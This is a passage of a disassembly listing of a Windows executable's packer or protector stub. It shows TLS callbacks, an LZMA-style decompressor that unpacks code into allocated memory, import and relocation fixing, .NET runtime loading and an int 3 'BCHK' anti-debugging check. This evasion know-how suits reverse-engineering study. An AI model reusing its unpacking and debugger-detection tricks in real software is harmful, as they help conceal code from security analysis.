dd 1CB8A9D0h, 850A7A57h, 0A861E98Ch, 0B02B5BFBh, 0C5234032h
dd 39AD16E4h, 7AB28DC9h, 0DE08DB53h, 1C602B6Ah, 1D9C76E9h
dd 3E12AD49h, 0FA79AA02h, 0DB25FFD7h, 123CCF35h, 56A79401h
dd 1AF2D5A2h, 941A8B3Eh, 89921989h, 2FAFC185h, 0C40C9E59h
dd 4F466F26h, 33463AD7h, 5CB3C27Ch, 4321568Bh, 0B3CC481Bh
dd 13A0286Eh, 3A937115h, 0DBA3700Bh, 860C7934h, 0DF3C9D13h
dd 0BBFC4873h, 0D3357052h, 92C78CBCh, 20C4CEF9h, 649D7458h
dd 475F7E3h, 0ECA13755h, 0F25E7B97h, 534C5A68h, 456BF288h
dd 5101F143h, 11E46BB3h, 86B0FEC7h, 0B4F7F8B6h, 7C3ED6D2h
dd 8FB8B599h, 520FBADh, 0C579415Eh, 494C230h, 913C1C40h
dd 731FAE8h, 0B7996E84h, 0C93DB358h, 1882A288h, 4140FEFFh
dd 1EF5B2E5h, 57779FBDh, 0EB4569CCh, 555E7479h, 0BD16C9D0h
dd 6625F78Ah, 453A7FAAh, 0D124528Dh, 0F41DB428h, 0C24593FAh
dd 0C4A2C546h, 0FEA22E29h, 13EABF8Dh, 0F3DB4873h, 67018E23h
dd 0DFCA6E35h, 5DBCDBF7h, 0A310EA64h, 84D9AD09h, 29F9B8ECh
dd 9A28B097h, 0BF0271D4h, 0EDB2BA05h, 6D4C16CDh, 0A6939CBFh
dd 264D27EEh, 0C4974585h, 0FA81B5C9h, 75D4F3EAh, 4D35DEB9h
dd 4757D009h, 7CA55949h, 66E10B74h, 0B3398B2Fh, 0BB7825F3h
dd 5DA672E9h, 0E9D9AED9h, 77C38D2Bh, 9EC50AF2h, 9E1FB650h
dd 0F8FF7921h
db 54h, 71h, 1Ch
_pdata ends
; Section 3. (virtual address 00030000)
; Virtual size : 0000193C ( 6460.)
; Section size in file : 0000193C ( 6460.)
; Offset to raw data for section: 00030000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_ex_cod segment para public 'CODE' use32
assume cs:_ex_cod
;org 430000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_430000 dd 185Ch ; DATA XREF: start:loc_430A55�r
; start+21�o
TlsCallbacks dd offset TlsCallback_0 ; DATA XREF: .ex_cod:TlsCallbacks_ptr�o
TlsIndex dd 0 ; DATA XREF: .ex_cod:TlsIndex_ptr�o
dword_43000C dd 0 ; DATA XREF: TlsCallback_0:loc_431323�r
; sub_431372+7�w
dword_430010 dd 1 ; DATA XREF: TlsCallback_0+44�w
; sub_431372�r
dword_430014 dd 400000h ; DATA XREF: TlsCallback_0+4A�w
; sub_431372+1F�r
dword_430018 dd 1 ; DATA XREF: TlsCallback_0+52�w
; sub_431372+19�r
dword_43001C dd 0 ; DATA XREF: TlsCallback_0+5A�w
; sub_431372+13�r
dword_430020 dd 0 ; DATA XREF: start+1E3�r
; TlsCallback_0+F�w
off_430024 dd offset dword_43185C ; DATA XREF: start+26�w start+2B�r ...
dword_430028 dd 400000h ; DATA XREF: start+38�w start+4C�r ...
dword_43002C dd 1 ; DATA XREF: start+3E�r
; start:loc_430A96�w
dword_430030 dd 0 ; DATA XREF: start+BA�w sub_4313E1+B�r ...
align 8
aUnexpectedRelo db 'Unexpected relocation type: *pw = 0x%04x *pdw = 0x%08x',0
; DATA XREF: start+801�o
aErrorBadReloca db 'Error bad relocation pointer: *pdw = 0x%08x',0 ; DATA XREF: start+7B1�o
aTheHsFileIsL_0 db 'The %hs file is ',0Ah ; DATA XREF: start+662�o
db 'linked to missing export %hs:%hs.',0
align 10h
aTheHsFileIsLin db 'The %hs file is ',0Ah ; DATA XREF: start+643�o
db 'linked to missing export %hs:0x%04x.',0
align 4
aARequired_dllF db 'A required .DLL file, %hs, was not found.',0 ; DATA XREF: start+558�o
align 4
aErrorAllocatin db 'Error allocating memory!',0 ; DATA XREF: start+2CD�o
align 10h
dword_430150 dd 5F696DCh, 36632B29h, 38C48BADh, 13A7F29Ch ; DATA XREF: sub_431421+131�o
aWks: ; DATA XREF: sub_431421+F1�o
unicode 0, <wks>,0
aOleaut32_dll db 'oleaut32.dll',0 ; DATA XREF: sub_431421+57�o
align 4
aCorbindtorunti db 'CorBindToRuntimeEx',0 ; DATA XREF: sub_431421+4F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_431421+45�o
aCouninitialize db 'CoUninitialize',0 ; DATA XREF: sub_431421+38�o
align 4
aCoinitialize db 'CoInitialize',0 ; DATA XREF: sub_431421+2D�o
align 4
aOle32_dll db 'ole32.dll',0 ; DATA XREF: sub_431421+11�o
align 4
dd 30200h, 2 dup(0)
dd 30304h, 30234h, 30228h, 2 dup(0)
dd 3032Ch, 3025Ch, 5 dup(0)
dd 30268h, 30276h, 30286h, 30298h, 302AAh, 302BEh, 302D0h
dd 302DEh, 302F4h, 0
dd 30312h, 3031Eh, 0
dword_430234 dd 77E79E34h ; DATA XREF: sub_430960+AD�r start+3AD�r ...
dword_430238 dd 77E7980Ah ; DATA XREF: sub_430960+65�r start+142�r ...
dword_43023C dd 77E7A5FDh ; DATA XREF: start+5F0�r start+612�r ...
dword_430240 dd 77E805B8h ; DATA XREF: start+508�r start+546�r
dword_430244 dd 77E79F93h ; DATA XREF: start+4F2�r
dword_430248 dd 77E6169Ah ; DATA XREF: start+4DA�r start+696�r ...
dword_43024C dd 77E75CB5h ; CODE XREF: sub_43139D+2C�p
; DATA XREF: start+2DC�r ...
dword_430250 dd 77E7A099h ; DATA XREF: start+177�r
dword_430254 dd 77E805D8h ; DATA XREF: sub_431421+9�r
dd 0
dword_43025C dd 77D4C96Ah ; DATA XREF: start+560�r start+64B�r ...
dword_430260 dd 77D6ADD7h ; DATA XREF: start+2D4�r start+573�r ...
align 8
dd 69560378h, 61757472h, 6572466Ch, 3750065h, 74726956h
dd 416C6175h, 636F6C6Ch, 1980000h, 50746547h, 41636F72h
dd 65726464h, 7373h, 6F4C0249h, 694C6461h, 72617262h, 41784579h
dd 1770000h, 4D746547h, 6C75646Fh, 6E614865h, 41656C64h
dd 37B0000h, 74726956h, 506C6175h, 65746F72h, 7463h, 784500AFh
dd 72507469h, 7365636Fh, 1750073h
aGetmodulefil_0 db 'GetModuleFileNameA',0
align 4
dd 6F4C0248h, 694C6461h, 72617262h, 4179h, 4E52454Bh, 32334C45h
dd 6C6C642Eh, 2D50000h, 72707377h, 66746E69h, 1DE0041h
dd 7373654Dh, 42656761h, 41786Fh, 52455355h, 642E3233h
dd 6C6Ch
; ---------------------------------------------------------------------------
loc_430338: ; DATA XREF: sub_431421+E5�o
and ah, [edi+2Fh]
retf
; ---------------------------------------------------------------------------
cmp ch, [ebx+409C11D2h]
add al, al
dec edi
mov ds:67233E0Ah, eax ; DATA XREF: sub_431421+EA�o
das
retf
; ---------------------------------------------------------------------------
dd 11D2AB3Ah, 0C000409Ch, 3E0AA34Fh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430358 proc near ; CODE XREF: sub_4305EB+309�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_4]
push esi
xor eax, eax
mov esi, [ecx+8]
push edi
mov edi, [ecx+0Ch]
test edx, edx
jle short loc_4303B0
push ebx
mov [ebp+arg_0], edx
loc_430373: ; CODE XREF: sub_430358+55�j
shr esi, 1
shl eax, 1
cmp edi, esi
jb short loc_43037F
sub edi, esi
or al, 1
loc_43037F: ; CODE XREF: sub_430358+21�j
cmp esi, 1000000h
jnb short loc_4303AA
mov edx, [ecx]
shl esi, 8
cmp edx, [ecx+4]
jnz short loc_43039D
mov dword ptr [ecx+10h], 1
or bl, 0FFh
jmp short loc_4303A2
; ---------------------------------------------------------------------------
loc_43039D: ; CODE XREF: sub_430358+37�j
mov bl, [edx]
inc edx
mov [ecx], edx
loc_4303A2: ; CODE XREF: sub_430358+43�j
movzx edx, bl
shl edi, 8
or edi, edx
loc_4303AA: ; CODE XREF: sub_430358+2D�j
dec [ebp+arg_0]
jnz short loc_430373
pop ebx
loc_4303B0: ; CODE XREF: sub_430358+15�j
mov [ecx+0Ch], edi
mov [ecx+8], esi
pop edi
pop esi
pop ebp
retn
sub_430358 endp
; =============== S U B R O U T I N E =======================================
sub_4303BA proc near ; CODE XREF: sub_43047F+1D�p
; sub_4304B6+1E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
push edi
mov eax, [ecx+8]
movzx esi, word ptr [edx]
mov edi, eax
shr edi, 0Bh
imul edi, esi
mov esi, [ecx+0Ch]
cmp esi, edi
jnb short loc_43042B
mov [ecx+8], edi
mov ax, [edx]
movzx esi, ax
mov edi, 800h
sub edi, esi
sar edi, 5
add edi, eax
mov [edx], di
mov eax, [ecx+8]
cmp eax, 1000000h
jnb short loc_430427
mov esi, [ecx]
cmp esi, [ecx+4]
jnz short loc_43040E
mov dword ptr [ecx+10h], 1
or dl, 0FFh
jmp short loc_430413
; ---------------------------------------------------------------------------
loc_43040E: ; CODE XREF: sub_4303BA+46�j
mov dl, [esi]
inc esi
mov [ecx], esi
loc_430413: ; CODE XREF: sub_4303BA+52�j
mov esi, [ecx+0Ch]
movzx edx, dl
shl esi, 8
or esi, edx
shl eax, 8
mov [ecx+0Ch], esi
mov [ecx+8], eax
loc_430427: ; CODE XREF: sub_4303BA+3F�j
xor eax, eax
jmp short loc_43047C
; ---------------------------------------------------------------------------
loc_43042B: ; CODE XREF: sub_4303BA+1D�j
sub eax, edi
sub esi, edi
mov [ecx+8], eax
mov [ecx+0Ch], esi
mov ax, [edx]
push 1
mov si, ax
shr si, 5
sub eax, esi
mov [edx], ax
mov edx, [ecx+8]
cmp edx, 1000000h
pop eax
jnb short loc_43047C
mov esi, [ecx]
push ebx
cmp esi, [ecx+4]
jnz short loc_430462
mov [ecx+10h], eax
or bl, 0FFh
jmp short loc_430467
; ---------------------------------------------------------------------------
loc_430462: ; CODE XREF: sub_4303BA+9E�j
mov bl, [esi]
inc esi
mov [ecx], esi
loc_430467: ; CODE XREF: sub_4303BA+A6�j
mov esi, [ecx+0Ch]
movzx edi, bl
shl esi, 8
or esi, edi
pop ebx
shl edx, 8
mov [ecx+0Ch], esi
mov [ecx+8], edx
loc_43047C: ; CODE XREF: sub_4303BA+6F�j
; sub_4303BA+96�j
pop edi
pop esi
retn
sub_4303BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43047F proc near ; CODE XREF: sub_430576+26�p
; sub_430576+51�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push 1
pop eax
jle short loc_4304AA
push esi
push edi
mov edi, [ebp+arg_4]
loc_430490: ; CODE XREF: sub_43047F+27�j
push [ebp+arg_8]
lea esi, [eax+eax]
mov eax, [ebp+arg_0]
add eax, esi
push eax
call sub_4303BA
pop ecx
add eax, esi
dec edi
pop ecx
jnz short loc_430490
pop edi
pop esi
loc_4304AA: ; CODE XREF: sub_43047F+A�j
mov ecx, [ebp+arg_4]
push 1
pop edx
shl edx, cl
sub eax, edx
pop ebp
retn
sub_43047F endp
; =============== S U B R O U T I N E =======================================
sub_4304B6 proc near ; CODE XREF: sub_4305EB+2F5�p
; sub_4305EB+320�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push edi
xor ebx, ebx
push 1
xor edi, edi
cmp [esp+0Ch+arg_4], ebx
pop edx
jle short loc_4304EC
push esi
loc_4304C6: ; CODE XREF: sub_4304B6+33�j
mov eax, [esp+0Ch+arg_0]
push [esp+0Ch+arg_8]
lea esi, [edx+edx]
add eax, esi
push eax
call sub_4303BA
pop ecx
lea edx, [esi+eax]
pop ecx
mov ecx, edi
shl eax, cl
or ebx, eax
inc edi
cmp edi, [esp+0Ch+arg_4]
jl short loc_4304C6
pop esi
loc_4304EC: ; CODE XREF: sub_4304B6+D�j
mov eax, ebx
pop edi
pop ebx
retn
sub_4304B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4304F1 proc near ; CODE XREF: sub_4305EB+143�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
movzx esi, [ebp+arg_8]
shr esi, 7
shl [ebp+arg_8], 1
mov eax, esi
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_4]
shl eax, 9
lea eax, [eax+edi+202h]
push eax
call sub_4303BA
pop ecx
mov ebx, eax
pop ecx
or ebx, 2
loc_430520: ; CODE XREF: sub_4304F1+5F�j
cmp esi, eax
jnz short loc_430552
cmp ebx, 100h
jge short loc_43056F
movzx esi, [ebp+arg_8]
shr esi, 7
push [ebp+arg_4]
lea eax, [esi+1]
shl [ebp+arg_8], 1
shl eax, 8
add eax, ebx
lea eax, [edi+eax*2]
push eax
call sub_4303BA
pop ecx
add ebx, ebx
pop ecx
or ebx, eax
jmp short loc_430520
; ---------------------------------------------------------------------------
loc_430552: ; CODE XREF: sub_4304F1+31�j
mov esi, 100h
loc_430557: ; CODE XREF: sub_4304F1+7C�j
cmp ebx, esi
jge short loc_43056F
push [ebp+arg_4]
add ebx, ebx
lea eax, [ebx+edi]
push eax
call sub_4303BA
pop ecx
or ebx, eax
pop ecx
jmp short loc_430557
; ---------------------------------------------------------------------------
loc_43056F: ; CODE XREF: sub_4304F1+39�j
; sub_4304F1+68�j
pop edi
mov al, bl
pop esi
pop ebx
pop ebp
retn
sub_4304F1 endp
; =============== S U B R O U T I N E =======================================
sub_430576 proc near ; CODE XREF: sub_4305EB+24F�p
; sub_4305EB+29E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push edi
push esi
call sub_4303BA
pop ecx
pop ecx
test eax, eax
push edi
jnz short loc_4305A6
mov eax, [esp+0Ch+arg_8]
push 3
shl eax, 4
lea eax, [eax+esi+4]
push eax
call sub_43047F
add esp, 0Ch
jmp short loc_4305E8
; ---------------------------------------------------------------------------
loc_4305A6: ; CODE XREF: sub_430576+16�j
lea eax, [esi+2]
push eax
call sub_4303BA
pop ecx
pop ecx
test eax, eax
push edi
jnz short loc_4305D4
mov eax, [esp+0Ch+arg_8]
push 3
shl eax, 4
lea eax, [eax+esi+104h]
push eax
call sub_43047F
add esp, 0Ch
add eax, 8
jmp short loc_4305E8
; ---------------------------------------------------------------------------
loc_4305D4: ; CODE XREF: sub_430576+3E�j
add esi, 204h
push 8
push esi
call sub_43047F
add esp, 0Ch
add eax, 10h
loc_4305E8: ; CODE XREF: sub_430576+2E�j
; sub_430576+5C�j
pop edi
pop esi
retn
sub_430576 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4305EB proc near ; CODE XREF: sub_430960+95�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 34h
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_C]
push 1
pop edx
xor bl, bl
lea ecx, [eax+edi]
mov eax, 300h
shl eax, cl
xor ecx, ecx
mov esi, edx
mov [ebp+var_4], ecx
mov [ebp+var_14], ecx
mov [ebp+arg_C], ecx
mov ecx, [ebp+arg_10]
shl esi, cl
add eax, 736h
mov ecx, edi
mov [ebp+var_8], edx
mov [ebp+var_10], edx
mov [ebp+var_C], edx
mov [ebp+var_18], edx
dec esi
mov [ebp+var_1C], esi
mov esi, edx
shl esi, cl
dec esi
mov [ebp+var_20], esi
mov esi, [ebp+arg_0]
test eax, eax
jbe short loc_430653
mov ecx, eax
mov eax, 4000400h
mov edi, esi
shr ecx, 1
rep stosd
adc ecx, ecx
rep stosw
loc_430653: ; CODE XREF: sub_4305EB+54�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_18]
and [ebp+var_24], 0
and [ebp+var_28], 0
or [ebp+var_2C], 0FFFFFFFFh
lea edi, [eax+ecx]
mov [ebp+var_34], eax
mov [ebp+var_30], edi
mov [ebp+arg_10], 5
loc_430675: ; CODE XREF: sub_4305EB+AF�j
cmp [ebp+var_34], edi
jnz short loc_430681
mov [ebp+var_24], edx
or al, 0FFh
jmp short loc_430689
; ---------------------------------------------------------------------------
loc_430681: ; CODE XREF: sub_4305EB+8D�j
mov eax, [ebp+var_34]
mov al, [eax]
inc [ebp+var_34]
loc_430689: ; CODE XREF: sub_4305EB+94�j
mov ecx, [ebp+var_28]
movzx eax, al
shl ecx, 8
or ecx, eax
dec [ebp+arg_10]
mov [ebp+var_28], ecx
jnz short loc_430675
mov eax, [ebp+arg_24]
and dword ptr [eax], 0
cmp [ebp+arg_20], 0
jbe loc_430951
loc_4306AC: ; CODE XREF: sub_4305EB+360�j
mov edi, [ebp+var_1C]
lea eax, [ebp+var_34]
and edi, [ebp+arg_C]
push eax
mov eax, [ebp+var_4]
shl eax, 4
add eax, edi
lea eax, [esi+eax*2]
push eax
call sub_4303BA
pop ecx
test eax, eax
pop ecx
jnz loc_430761
mov edx, [ebp+var_20]
mov cl, 8
sub cl, byte ptr [ebp+arg_8]
and edx, [ebp+arg_C]
movzx eax, bl
shr eax, cl
mov ecx, [ebp+arg_8]
shl edx, cl
add eax, edx
lea eax, [eax+eax*2]
shl eax, 9
cmp [ebp+var_4], 4
lea edi, [eax+esi+0E6Ch]
jge short loc_430701
and [ebp+var_4], 0
jmp short loc_430711
; ---------------------------------------------------------------------------
loc_430701: ; CODE XREF: sub_4305EB+10E�j
cmp [ebp+var_4], 0Ah
jge short loc_43070D
sub [ebp+var_4], 3
jmp short loc_430711
; ---------------------------------------------------------------------------
loc_43070D: ; CODE XREF: sub_4305EB+11A�j
sub [ebp+var_4], 6
loc_430711: ; CODE XREF: sub_4305EB+114�j
; sub_4305EB+120�j
cmp [ebp+var_14], 0
jz short loc_43073E
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_1C]
sub eax, [ebp+var_8]
mov al, [eax+ecx]
mov byte ptr [ebp+arg_10], al
lea eax, [ebp+var_34]
push [ebp+arg_10]
push eax
push edi
call sub_4304F1
add esp, 0Ch
and [ebp+var_14], 0
mov bl, al
jmp short loc_43075C
; ---------------------------------------------------------------------------
loc_43073E: ; CODE XREF: sub_4305EB+12A�j
push 1
pop ebx
loc_430741: ; CODE XREF: sub_4305EB+16F�j
add ebx, ebx
lea eax, [ebp+var_34]
push eax
lea eax, [ebx+edi]
push eax
call sub_4303BA
or ebx, eax
pop ecx
cmp ebx, 100h
pop ecx
jl short loc_430741
loc_43075C: ; CODE XREF: sub_4305EB+151�j
mov eax, [ebp+arg_1C]
jmp short loc_4307D4
; ---------------------------------------------------------------------------
loc_430761: ; CODE XREF: sub_4305EB+E0�j
mov ebx, [ebp+var_4]
lea eax, [ebp+var_34]
push eax
mov [ebp+var_14], 1
lea eax, [esi+ebx*2+180h]
push eax
call sub_4303BA
pop ecx
cmp eax, 1
pop ecx
jnz loc_43085A
lea eax, [ebp+var_34]
push eax
lea eax, [esi+ebx*2+198h]
push eax
call sub_4303BA
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+var_34]
push eax
jnz short loc_4307E2
lea eax, [ebx+0Fh]
shl eax, 4
add eax, edi
lea eax, [esi+eax*2]
push eax
call sub_4303BA
pop ecx
test eax, eax
pop ecx
jnz short loc_43082E
cmp ebx, 7
mov ecx, [ebp+arg_C]
setnl al
dec eax
and al, 0FEh
add eax, 0Bh
sub ecx, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_1C]
mov bl, [ecx+eax]
loc_4307D4: ; CODE XREF: sub_4305EB+174�j
mov ecx, [ebp+arg_C]
inc [ebp+arg_C]
mov [ecx+eax], bl
jmp loc_430945
; ---------------------------------------------------------------------------
loc_4307E2: ; CODE XREF: sub_4305EB+1B5�j
lea eax, [esi+ebx*2+1B0h]
push eax
call sub_4303BA
pop ecx
test eax, eax
pop ecx
jnz short loc_4307FA
mov eax, [ebp+var_10]
jmp short loc_430825
; ---------------------------------------------------------------------------
loc_4307FA: ; CODE XREF: sub_4305EB+208�j
lea eax, [ebp+var_34]
push eax
lea eax, [esi+ebx*2+1C8h]
push eax
call sub_4303BA
pop ecx
test eax, eax
pop ecx
jnz short loc_430816
mov eax, [ebp+var_C]
jmp short loc_43081F
; ---------------------------------------------------------------------------
loc_430816: ; CODE XREF: sub_4305EB+224�j
mov ecx, [ebp+var_C]
mov eax, [ebp+var_18]
mov [ebp+var_18], ecx
loc_43081F: ; CODE XREF: sub_4305EB+229�j
mov ecx, [ebp+var_10]
mov [ebp+var_C], ecx
loc_430825: ; CODE XREF: sub_4305EB+20D�j
mov ecx, [ebp+var_8]
mov [ebp+var_8], eax
mov [ebp+var_10], ecx
loc_43082E: ; CODE XREF: sub_4305EB+1CC�j
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [esi+0A68h]
push eax
call sub_430576
mov edi, eax
add esp, 0Ch
xor eax, eax
cmp ebx, 7
setnl al
dec eax
and al, 0FDh
add eax, 0Bh
mov [ebp+var_4], eax
jmp loc_43091E
; ---------------------------------------------------------------------------
loc_43085A: ; CODE XREF: sub_4305EB+196�j
mov eax, [ebp+var_C]
push edi
mov [ebp+var_18], eax
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
xor eax, eax
cmp ebx, 7
setnl al
dec eax
and al, 0FDh
add eax, 0Ah
mov [ebp+var_4], eax
lea eax, [ebp+var_34]
push eax
lea eax, [esi+664h]
push eax
call sub_430576
mov edi, eax
add esp, 0Ch
cmp edi, 4
jge short loc_43089A
jmp short loc_43089D
; ---------------------------------------------------------------------------
loc_43089A: ; CODE XREF: sub_4305EB+2AB�j
push 3
pop eax
loc_43089D: ; CODE XREF: sub_4305EB+2AD�j
shl eax, 7
lea ecx, [ebp+var_34]
push ecx
lea eax, [eax+esi+360h]
push 6
push eax
call sub_43047F
add esp, 0Ch
cmp eax, 4
jl short loc_430915
mov ecx, eax
mov ebx, eax
sar ecx, 1
and ebx, 1
dec ecx
or ebx, 2
shl ebx, cl
cmp eax, 0Eh
jge short loc_4308EC
lea edx, [ebp+var_34]
push edx
push ecx
mov ecx, ebx
sub ecx, eax
lea eax, [esi+ecx*2+55Eh]
push eax
call sub_4304B6
add esp, 0Ch
loc_4308E8: ; CODE XREF: sub_4305EB+328�j
add ebx, eax
jmp short loc_43091A
; ---------------------------------------------------------------------------
loc_4308EC: ; CODE XREF: sub_4305EB+2E2�j
add ecx, 0FFFFFFFCh
lea eax, [ebp+var_34]
push ecx
push eax
call sub_430358
shl eax, 4
add ebx, eax
lea eax, [ebp+var_34]
push eax
lea eax, [esi+644h]
push 4
push eax
call sub_4304B6
add esp, 14h
jmp short loc_4308E8
; ---------------------------------------------------------------------------
loc_430915: ; CODE XREF: sub_4305EB+2CE�j
mov [ebp+var_8], eax
mov ebx, eax
loc_43091A: ; CODE XREF: sub_4305EB+2FF�j
inc ebx
mov [ebp+var_8], ebx
loc_43091E: ; CODE XREF: sub_4305EB+26A�j
cmp [ebp+var_8], 0
jz short loc_430951
inc edi
inc edi
loc_430926: ; CODE XREF: sub_4305EB+358�j
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_1C]
mov edx, ecx
sub edx, [ebp+var_8]
mov bl, [edx+eax]
mov [ecx+eax], bl
inc ecx
dec edi
mov [ebp+arg_C], ecx
test edi, edi
jle short loc_430945
cmp ecx, [ebp+arg_20]
jb short loc_430926
loc_430945: ; CODE XREF: sub_4305EB+1F2�j
; sub_4305EB+353�j
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_20]
jb loc_4306AC
loc_430951: ; CODE XREF: sub_4305EB+BB�j
; sub_4305EB+337�j
mov ecx, [ebp+arg_24]
mov eax, [ebp+arg_C]
pop edi
pop esi
mov [ecx], eax
xor eax, eax
pop ebx
leave
retn
sub_4305EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430960 proc near ; CODE XREF: start+26F�p start+329�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov cl, [eax]
cmp cl, 0E1h
jnb short loc_4309D2
xor ebx, ebx
cmp cl, 2Dh
mov [ebp+var_4], ebx
jb short loc_430990
movzx eax, cl
push 2Dh
xor edx, edx
pop esi
div esi
mov [ebp+var_4], eax
loc_43098A: ; CODE XREF: sub_430960+2E�j
add cl, 0D3h
dec eax
jnz short loc_43098A
loc_430990: ; CODE XREF: sub_430960+1B�j
cmp cl, 9
jb short loc_4309A7
movzx eax, cl
push 9
xor edx, edx
pop esi
div esi
mov ebx, eax
loc_4309A1: ; CODE XREF: sub_430960+45�j
add cl, 0F7h
dec eax
jnz short loc_4309A1
loc_4309A7: ; CODE XREF: sub_430960+33�j
movzx esi, cl
mov eax, 300h
push 4
lea ecx, [esi+ebx]
push 1000h
shl eax, cl
lea edi, [eax+eax+0E6Ch]
push edi
push 0
call ds:dword_430238 ; VirtualAlloc
test eax, eax
mov [ebp+var_C], eax
jnz short loc_4309D7
loc_4309D2: ; CODE XREF: sub_430960+11�j
push 1
pop eax
jmp short loc_430A34
; ---------------------------------------------------------------------------
loc_4309D7: ; CODE XREF: sub_430960+70�j
lea ecx, [ebp+var_8]
push ecx
mov ecx, [ebp+arg_4]
push 0FFFFFFFFh
add ecx, 0FFFFFFFBh
push [ebp+arg_8]
push ecx
mov ecx, [ebp+arg_0]
add ecx, 5
push ecx
push [ebp+var_4]
push ebx
push esi
push edi
push eax
call sub_4305EB
add esp, 28h
mov esi, [ebp+var_8]
xor ebx, ebx
mov edi, eax
push 8000h
push ebx
push [ebp+var_C]
call ds:dword_430234 ; VirtualFree
lea eax, [ebp+var_10]
mov [ebp+var_14], ebx
push eax
lea eax, [ebp+var_14]
push eax
push ebx
push esi
mov [ebp+var_10], 0FFFFFFFBh
push [ebp+arg_8]
call sub_4316A2
add esp, 14h
mov eax, edi
loc_430A34: ; CODE XREF: sub_430960+75�j
pop edi
pop esi
pop ebx
leave
retn
sub_430960 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; DATA XREF: start+30�o
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00431309 SIZE 00000005 BYTES
push ebp
mov ebp, esp
sub esp, 60h
push ebx
push esi
push edi
and [ebp+var_28], 0
rep jmp short loc_430A55
; ---------------------------------------------------------------------------
db 65h, 58h, 50h
dd 2E762D72h, 2E342E31h
db 0
; ---------------------------------------------------------------------------
loc_430A55: ; CODE XREF: start+D�j
mov eax, ds:dword_430000
add eax, offset dword_430000
mov ds:off_430024, eax
mov eax, ds:off_430024
mov ecx, offset start
sub ecx, [eax+18h]
mov ds:dword_430028, ecx
cmp ds:dword_43002C, 0
jz short loc_430A96
mov eax, ds:off_430024
mov ecx, ds:dword_430028
add ecx, [eax+14h]
mov [ebp+var_38], ecx
jmp loc_4312A4
; ---------------------------------------------------------------------------
loc_430A96: ; CODE XREF: start+45�j
mov ds:dword_43002C, 1
mov eax, offset sub_4313E1
push eax
push large dword ptr fs:0
mov large fs:0, esp
push 5
mov eax, offset sub_431401
add eax, 0Eh
push eax
call sub_431401
pop ecx
pop ecx
imul eax, 8Ch
mov ecx, ds:off_430024
add ecx, eax
mov ds:off_430024, ecx
call sub_43139D
imul eax, 8Ch
mov ecx, ds:off_430024
add ecx, eax
mov ds:off_430024, ecx
mov ds:dword_430030, offset loc_430B18
push ebp
push eax
mov eax, 0B9h
add eax, 13h
mov ebp, offset loc_430B18
mov [ebp+0], al
mov ebp, 4243484Bh
mov ax, 4
loc_430B18: ; DATA XREF: start+BA�o start+CE�o
int 3 ; Trap to Debugger
cmp al, 4
pop eax
pop ebp
jnz short loc_430B21
jmp short loc_430B28
